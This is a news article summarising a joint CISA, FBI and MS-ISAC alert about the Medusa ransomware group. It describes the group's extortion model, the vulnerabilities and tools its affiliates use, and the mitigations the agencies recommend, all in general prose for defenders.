Critical Infrastructure Entities Warned About Medusa Ransomware as Victim Count Hits 300
A warning has been issued about the Medusa ransomware-as-a-service (RaaS) group, which has now claimed more than 300 victims in critical infrastructure sectors including healthcare, education, and manufacturing. The group has been active since June 2021 when it started as a closed group, before adopting the RaaS model, where affiliates are recruited to conduct attacks for a percentage of any ransom payments they generate.
Around two years after the group formed, Medusa launched a data leak site where victims are named and stolen data is published if the ransom is not paid. This double extortion method, where the ransom must be paid to obtain the decryption keys and prevent the publication of stolen data, is common among RaaS groups, although in the case of Medusa, its core members have retained control of ransom negotiations.
According to the joint cybersecurity alert from the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), the Medusa developers recruit initial access brokers (IABs) on cybercriminal forums and marketplaces and incentivize them to work solely with Medusa. The authoring agencies have observed affiliates using phishing to obtain credentials to access victims’ networks, as well as exploiting unpatched software vulnerabilities, including last year’s ScreenConnect vulnerability CVE-2024-1709 and the Fortinet EMS SQL injection vulnerability CVE-2023-48788.
Once access to a victim’s network has been gained, Medusa actors use living off the land techniques for user, system, network, and file system enumeration, including legitimate tools such as Advanced IP Scanner, SoftPerfect Network Scanner, PowerShell, Windows Command Prompt, and Ingress Tool Transfer capabilities, as well as Windows Management Instrumentation (WMI) for querying system information.
Get The FREE
HIPAA Compliance Checklist
Immediate Delivery of Checklist Link To Your Email Address
Please Enter Correct Email Address
Your Privacy Respected
HIPAA Journal Privacy Policy
The authoring agencies have observed Medusa actors using several different PowerShell detection evasion techniques, and they are known to hide their activities by deleting the PowerShell command line history. Endpoint detection and response tools are disabled by using vulnerable or signed drivers to kill processes, and legitimate remote access software is often used to evade detection and assist with lateral movement, along with Remote Desktop Protocol (RDP) and PsExec. Rclone is used to facilitate data exfiltration, and the encryptor is deployed across the network using tools such as Sysinternals PsExec, PDQ Deploy, and BigFix. Windows Defender and other security tools are also disabled on specific targets, backup processes are terminated, and shadow copies are deleted to prevent restoration of encrypted files without paying the ransom. Victims are given 48 hours to make contact to negotiate the ransom payment, with Medusa actors also known to reach out to victims via phone or email. There has been at least one instance where a further ransom demand was issued after the initial payment was made, where the affiliate behind the attack claimed not to have been paid.
The cybersecurity alert shares indicators of Compromise (IOCs), known MITRE ATT&CK tactics and techniques, and recommended mitigations, the most important of which are mitigating known vulnerabilities promptly, segmenting networks to restrict lateral movement, filtering network traffic to prevent unknown or untrusted origins from accessing remote services on internal systems, implementing multifactor authentication for webmail, VPNs, and all accounts that access critical systems, and educating the workforce about phishing identification and avoidance.
